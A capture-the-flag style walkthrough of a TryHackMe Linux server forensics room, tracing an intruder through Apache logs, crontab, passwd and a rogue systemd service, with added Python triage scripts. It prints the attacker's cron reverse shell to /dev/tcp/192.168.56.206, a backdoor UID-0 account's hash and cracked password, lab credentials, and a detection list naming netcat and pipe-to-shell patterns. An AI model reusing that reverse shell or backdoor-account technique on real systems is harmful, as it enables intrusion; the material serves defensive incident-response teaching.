TryHackMe — Linux Server Forensics

0xNehru
3 min read, Jun 2, 2021


First VM

  • 10.10.197.91
  • Username — 'fred'
  • Password — 'FredRules!'

#2 :- Navigate to /var/log/apache2?

fred@acmeweb:~$ cd /var/log/apache2
fred@acmeweb:/var/log/apache2$ ls
access.log error.log other_vhosts_access.log
fred@acmeweb:/var/log/apache2$

#3 :- How many different tools made requests to the server?

Answer :- 2

#4 :- Name a path requested by Nmap?

fred@acmeweb:/var/log/apache2$ cat access.log | grep nmap | cut -d '"' -f 2 | sort | uniq

GET /evox/about HTTP/1.1
GET /favicon.ico HTTP/1.1
GET /.git/HEAD HTTP/1.1
GET /HNAP1 HTTP/1.1
GET / HTTP/1.1
GET /nmaplowercheck1618912425 HTTP/1.1
GET /robots.txt HTTP/1.1
IDRT / HTTP/1.1
OPTIONS / HTTP/1.1
POST / HTTP/1.1
POST /sdk HTTP/1.1
PROPFIND / HTTP/1.1

Answer :- /nmaplowercheck1618912425

Web Server Analysis

#5 :- What page allows users to upload files?

Answer :- contact.php

#6 :- What IP uploaded files to the server?

fred@acmeweb:/var/log/apache2$ grep "POST" access.log

192.168.56.24 - - [20/Apr/2021:09:53:46 +0000] "POST / HTTP/1.1" 200 2495 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
192.168.56.24 - - [20/Apr/2021:09:53:46 +0000] "POST /sdk HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
Binary file access.log matches

Answer :- 192.168.56.24

#7 :- Who left an exposed security notice on the server?

fred@acmeweb:/var/log/apache2$ cat access.log | grep -i dirbus | grep -v 404 | cut -d '"' -f 2 | sort | uniq

Answer :- fred

#8 :- What command and option did the attacker use to establish a backdoor?

cat /etc/crontab

root2 sh -i >& /dev/tcp/192.168.56.206/1234 0>&1

Answer :- sh -i
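The crontab entry above is the classic bash reverse shell: an interactive shell with its stdin/stdout/stderr wired to a TCP socket that bash opens through /dev/tcp. When you triage a box you rarely have only one crontab line to read, so the following is an added example (mine, not part of the room or this writeup) of a small checker that parses a system crontab and flags commands carrying reverse-shell or download-and-run indicators, and pulls out the /dev/tcp endpoint so you have something to block and hunt for. The sample crontab is constructed: the stock Debian entries are assumed, and the schedule fields in front of the root2 line are assumed too, since the writeup only shows the user and command part.

```python
import re

# Constructed system crontab: stock Debian entries (assumed) plus the root2
# line from the writeup; its "* * * * *" schedule is an assumption.
SAMPLE_CRONTAB = r"""
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
@reboot         root    /usr/local/bin/backup-rotate
* * * * *       root2   sh -i >& /dev/tcp/192.168.56.206/1234 0>&1
"""

# Indicators of a shell being handed to a remote peer or of a loader that
# fetches and executes code. A hit is a triage lead, not proof by itself.
INDICATORS = [
    ("interactive shell", re.compile(r"\b(?:ba)?sh\s+-i\b")),
    ("bash /dev/tcp socket", re.compile(r"/dev/(?:tcp|udp)/")),
    ("netcat", re.compile(r"\b(?:nc|ncat|netcat)\b")),
    ("pipe to shell", re.compile(r"\|\s*(?:ba)?sh\b")),
    ("base64 payload", re.compile(r"base64\s+(?:-d|--decode)")),
]

# System crontab line: five schedule fields (or an @reboot-style shortcut),
# then the user to run as, then the command.
CRON_RE = re.compile(
    r"^(?P<schedule>@\w+|(?:\S+\s+){5})\s*(?P<user>\S+)\s+(?P<command>.+)$"
)
ENDPOINT_RE = re.compile(r"/dev/(?:tcp|udp)/([\w.\-]+)/(\d+)")


def parse_crontab(text):
    """Return one dict per job; variable assignments and comments are skipped."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_RE.match(line)
        if m is None:
            continue  # SHELL=..., PATH=... and anything else that is not a job
        jobs.append({"schedule": m["schedule"].strip(),
                     "user": m["user"], "command": m["command"]})
    return jobs


def suspicious_jobs(jobs):
    """(user, command, [indicator names]) for every job that matches something."""
    findings = []
    for job in jobs:
        hits = [name for name, rx in INDICATORS if rx.search(job["command"])]
        if hits:
            findings.append((job["user"], job["command"], hits))
    return findings


def remote_endpoints(jobs):
    """(host, port) pairs that bash would connect to via /dev/tcp or /dev/udp."""
    return [(m[1], int(m[2]))
            for job in jobs for m in ENDPOINT_RE.finditer(job["command"])]


if __name__ == "__main__":
    jobs = parse_crontab(SAMPLE_CRONTAB)
    for user, command, hits in suspicious_jobs(jobs):
        print(f"[{user}] {command}\n    indicators: {', '.join(hits)}")
    for host, port in remote_endpoints(jobs):
        print(f"outbound endpoint to block/hunt: {host}:{port}")
```

The same checker applies to the per-user files under /var/spool/cron/crontabs (which have no user column, so drop that group from the pattern) and to the scripts in /etc/cron.d, /etc/cron.hourly and friends; the crontab is only one of several places a scheduled backdoor can hide.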

#9 :- What is the password of the second root account?

fred@acmeweb:/$ cd /etc/
fred@acmeweb:/etc$ cat passwd

fred:x:1000:1000:fred:/home/fred:/bin/bash
root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash

Answer :- mrcake
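Two things give root2 away in the passwd output above: it is a second account with UID 0, and its password field holds a hash instead of the "x" that says "look in /etc/shadow", so the hash sits in a world-readable file. The 13-character hash with no "$" prefix is the legacy DES crypt format, which truncates passwords to 8 characters. The following is an added example of mine (not from the room or the writeup) that parses /etc/passwd and reports exactly those conditions plus empty password fields and shared UIDs; the sample is constructed from the two lines quoted above together with a normal root entry and two assumed system accounts. It identifies the hash scheme but does not attempt to crack anything.

```python
import re

# Constructed /etc/passwd excerpt: a normal root line, two assumed system
# accounts, and the two lines quoted in the writeup (fred and root2).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
fred:x:1000:1000:fred:/home/fred:/bin/bash
root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash
"""

# Password-field values that mean "no usable hash here": shadowed or locked.
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}


def hash_type(pw):
    """Name the crypt(3) scheme from its prefix. The prefix-less 13-character
    form is legacy DES crypt: salt of 2 chars, passwords truncated to 8."""
    prefixes = {"$6$": "sha512crypt", "$5$": "sha256crypt", "$y$": "yescrypt",
                "$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt"}
    for prefix, name in prefixes.items():
        if pw.startswith(prefix):
            return name
    if re.fullmatch(r"[./0-9A-Za-z]{13}", pw):
        return "descrypt"
    return "unknown"


def parse_passwd(text):
    """One dict per account; malformed lines (not 7 colon-separated fields) are skipped."""
    users = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        users.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
                      "home": home, "shell": shell})
    return users


def audit_passwd(users):
    """(account, finding) pairs for the conditions an analyst wants to see first."""
    findings = []
    for u in users:
        if u["uid"] == 0 and u["name"] != "root":
            findings.append((u["name"], "extra UID 0 account"))
        if u["pw"] == "":
            findings.append((u["name"], "empty password field"))
        elif u["pw"] not in SHADOWED_OR_LOCKED:
            findings.append((u["name"],
                             f"{hash_type(u['pw'])} hash stored in world-readable /etc/passwd"))
    by_uid = {}
    for u in users:
        by_uid.setdefault(u["uid"], []).append(u["name"])
    for uid, names in by_uid.items():
        if len(names) > 1:
            findings.append((",".join(names), f"UID {uid} shared"))
    return findings


if __name__ == "__main__":
    for account, finding in audit_passwd(parse_passwd(SAMPLE_PASSWD)):
        print(f"{account}: {finding}")
```

On a live system, run it against /etc/passwd and then diff the result against a known-good package baseline; the account name "root2" is only suspicious because a human recognises it, while the UID 0 and hash-in-passwd checks catch the same trick under any name.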

Second VM

#1 :- Name one of the non-standard HTTP Requests.

hint — Grep searches can be inverted using the -v option to select non-matching lines. Search for GET or POST requests.

command — cat access.log | cut -d '"' -f 2 | sort | uniq

GET /static/img/Turbo.jpg HTTP/1.1
GXWR / HTTP/1.1
OPTIONS / HTTP/1.1
POST /contact.php HTTP/1.1
\x16\x03

Answer :- GXWR

#2 :- At what time was the Nmap scan performed? (format: HH:MM:SS)

fred@acmeweb:/var/log/apache2$ cat access.log | grep -a GXWR
192.168.56.206 - - [20/Apr/2021:13:30:15 +0000] "GXWR / HTTP/1.1" 501 498 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML"

Answer :- 13:30:15
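The cut/sort/uniq one-liners in both VMs work because the combined log format is regular: client IP, timestamp in brackets, the request line in quotes, status, size, referer and user agent. Note the "Binary file access.log matches" that grep printed in the first VM: the log contains bytes grep does not treat as text, which is why the author switches to grep -a later. The following is an added example of mine (not from the room or the writeup) that does the same work as the one-liners in one pass over a parsed log: it fingerprints scanning tools by user agent (and by Nmap's /nmaplowercheck probe path, which survives a spoofed agent), lists the paths each tool requested, collects the source IPs of POST requests, and flags requests whose method is not a real HTTP or WebDAV method, with the timestamp, which is how the Nmap scan time was found above. The sample log is constructed: the Nmap, GXWR and contact.php lines are modelled on those quoted in the writeup, and the DirBuster lines and the TLS ClientHello sent to the plain-HTTP port (logged by Apache as escaped bytes) are assumed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample log in Apache "combined" format (see lead-in for what is
# modelled on the writeup and what is assumed).
SAMPLE_LOG = r"""
192.168.56.24 - - [20/Apr/2021:09:53:46 +0000] "GET / HTTP/1.1" 200 2495 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
192.168.56.24 - - [20/Apr/2021:09:53:46 +0000] "GET /nmaplowercheck1618912425 HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
192.168.56.24 - - [20/Apr/2021:09:53:46 +0000] "POST /sdk HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
192.168.56.24 - - [20/Apr/2021:09:53:47 +0000] "PROPFIND / HTTP/1.1" 405 512 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
192.168.56.206 - - [20/Apr/2021:10:12:01 +0000] "GET /admin/ HTTP/1.1" 404 454 "-" "DirBuster-1.0-RC1 (http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project)"
192.168.56.206 - - [20/Apr/2021:10:12:01 +0000] "GET /backup/ HTTP/1.1" 404 454 "-" "DirBuster-1.0-RC1 (http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project)"
192.168.56.206 - - [20/Apr/2021:13:30:15 +0000] "GXWR / HTTP/1.1" 501 498 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko)"
192.168.56.206 - - [20/Apr/2021:13:31:02 +0000] "\x16\x03\x01" 400 0 "-" "-"
10.0.0.5 - - [20/Apr/2021:14:02:11 +0000] "POST /contact.php HTTP/1.1" 200 1024 "http://acmeweb/contact.php" "Mozilla/5.0 (X11; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

STANDARD_METHODS = {
    "GET", "HEAD", "POST", "PUT", "DELETE", "CONNECT", "OPTIONS", "TRACE", "PATCH",
    "PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK",  # WebDAV
}

# Substrings of the default user agents of common scanners.
TOOL_SIGNATURES = {"Nmap": ["Nmap Scripting Engine"], "DirBuster": ["DirBuster"]}


def parse_log(text):
    """One dict per well-formed line, with method, path and HH:MM:SS split out."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # blank or malformed line
        e = m.groupdict()
        parts = e["request"].split()
        e["method"] = parts[0] if parts else ""
        e["path"] = parts[1] if len(parts) > 1 else ""
        e["clock"] = e["time"].split(":", 1)[1].split()[0]
        entries.append(e)
    return entries


def identify_tool(entry):
    for tool, needles in TOOL_SIGNATURES.items():
        if any(n in entry["agent"] for n in needles):
            return tool
    if entry["path"].startswith("/nmaplowercheck"):  # NSE probe, agent-independent
        return "Nmap"
    return None


def tools_seen(entries):
    """tool name -> sorted list of distinct paths it requested."""
    paths = defaultdict(set)
    for e in entries:
        tool = identify_tool(e)
        if tool:
            paths[tool].add(e["path"])
    return {tool: sorted(p) for tool, p in paths.items()}


def post_sources(entries):
    """Distinct client IPs that sent POST requests (upload candidates)."""
    return sorted({e["ip"] for e in entries if e["method"] == "POST"})


def nonstandard_requests(entries):
    """(clock, ip, method) for methods no real client sends: scanner probes,
    TLS handshakes on the wrong port, fuzzing."""
    return [(e["clock"], e["ip"], e["method"])
            for e in entries if e["method"] not in STANDARD_METHODS]


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    for tool, paths in tools_seen(entries).items():
        print(f"{tool}: {len(paths)} distinct paths, e.g. {paths[:3]}")
    print("POST sources:", post_sources(entries))
    for clock, ip, method in nonstandard_requests(entries):
        print(f"{clock} {ip} non-standard method {method!r}")
```

Because the script keys on the request line rather than on raw grep hits, the TLS-handshake junk that makes grep call the file binary is parsed and reported like any other entry instead of tripping the tooling.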

#3 :- What username and hostname combination can be found in one of the authorized_keys files? (format: username@hostname)

fred@acmeweb:/var/log/apache2$ sudo cat /root/.ssh/authorized_keys
[sudo] password for fred:

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDYCKt0bYP2YIwMWdJWqF3lr3Drs3sS9hiybsxz9W6dG6d15mg0SVMSe5H+rPM6VmzOKJaVpDjT1Ll5eR6YcbefTF2bMXHveyvcrzDxyZeWdgBs5u8/4DZxEN6fq6IZRRftmrMgMzSnpmdCm8kvacgq3lIjLx/sKAlX9GqPIz09t0Rk5MB7zk3lg1wdTZxZwwCHPbZW7mGlVcxNBB9wdbAmcvezscoF0i7v0tY8iCoFlrBysOMBMrEJji2UONtI/wrt7AvoK+gshiG7VTjZ2oQBacnyHRToXHxOZiSIbCQrJ6rCxa32QOGQNmAVIucqYjRbJedz0NbGq7M9B+hBmG/mdtsoGOXQKyzoUlAbulRXjSVtManiUyq9im1HBHfuduiBrbfcOKz24NMT7RaIsPsZCUCpfHaT7S5XplQypAjkxABds8jod/TXcTYibdWE9scrUUidgCsPELQlKEfhhZ8+cyjbMCGNB5LOgieJSVk6D1JC97TaFNi4X9/9i2UA+L0= kali@kali

Answer :- kali@kali

#4 :- What is the first command present in root's bash_history file?

fred@acmeweb:/var/log/apache2$ sudo head /root/.bash_history
nano /etc/passwd
exit

Answer :- nano /etc/passwd

Final VM

#1 :- Figure out what’s going on and find the flag.

hint — Use the above to locate and open the script that’s causing the errors. You might want to check the IpManager service. Flag format: [XXXXXXXXXX]

fred@acmeweb:~$ systemctl status IpManager.service
● IpManager.service
Loaded: loaded (/var/lib/network/IpManager.service; enabled; vendor preset: enabled)
Active: active (running) since Wed 2021-06-02 13:44:20 UTC; 26s ago
Main PID: 1462 (bash)
Tasks: 2 (limit: 499)
CGroup: /system.slice/IpManager.service
├─1462 /bin/bash /etc/network/ZGtsam5hZG1ua2Fu.sh
└─1485 sleep 10

fred@acmeweb:~$ cat /etc/network/ZGtsam5hZG1ua2Fu.sh
##[gh0st_1n_the_machine]
##

Answer :- gh0st_1n_the_machine
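Two details in the systemctl output point at the script before you even open it: the unit file is loaded from /var/lib/network, which is not one of the directories systemd normally takes units from, and the main process is an interpreter running a script with a base64-looking name. The following is an added example of mine (not from the room or the writeup) that parses a copy of that status output and applies exactly those two checks; the output text is a constructed copy of what the writeup shows.

```python
import re

# Constructed copy of the `systemctl status IpManager.service` output quoted
# in the writeup.
SAMPLE_STATUS = """\
● IpManager.service
   Loaded: loaded (/var/lib/network/IpManager.service; enabled; vendor preset: enabled)
   Active: active (running) since Wed 2021-06-02 13:44:20 UTC; 26s ago
 Main PID: 1462 (bash)
    Tasks: 2 (limit: 499)
   CGroup: /system.slice/IpManager.service
           ├─1462 /bin/bash /etc/network/ZGtsam5hZG1ua2Fu.sh
           └─1485 sleep 10
"""

# Directories a packaged or admin-installed unit is expected to live in.
UNIT_DIRS = ("/etc/systemd/system/", "/lib/systemd/system/",
             "/usr/lib/systemd/system/", "/run/systemd/system/")
# Interpreters whose first argument is a script worth reading.
INTERPRETERS = {"/bin/bash", "/bin/sh", "/usr/bin/bash", "/usr/bin/sh",
                "/usr/bin/python3", "/usr/bin/perl"}

LOADED_RE = re.compile(r"Loaded:\s+\w+\s+\((?P<path>[^;)]+)")
PROC_RE = re.compile(r"[├└]─(?P<pid>\d+)\s+(?P<cmd>.+)$")


def parse_status(text):
    """Unit file path and the (pid, command line) list from the CGroup tree."""
    info = {"unit_path": None, "processes": []}
    for line in text.splitlines():
        m = LOADED_RE.search(line)
        if m:
            info["unit_path"] = m["path"]
        m = PROC_RE.search(line)
        if m:
            info["processes"].append((int(m["pid"]), m["cmd"].strip()))
    return info


def triage(info):
    """Human-readable findings: odd unit location, interpreter-launched scripts."""
    findings = []
    path = info["unit_path"]
    if path and not path.startswith(UNIT_DIRS):
        findings.append(f"unit file loaded from non-standard location {path}")
    for pid, cmd in info["processes"]:
        argv = cmd.split()
        if len(argv) > 1 and argv[0] in INTERPRETERS:
            findings.append(f"pid {pid}: {argv[0]} runs script {argv[1]}")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_status(SAMPLE_STATUS)):
        print(finding)
```

Run it over `systemctl status '*'` output on a suspect host and you get a short list of units to read and scripts to open, which is the step the hint is pointing at.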
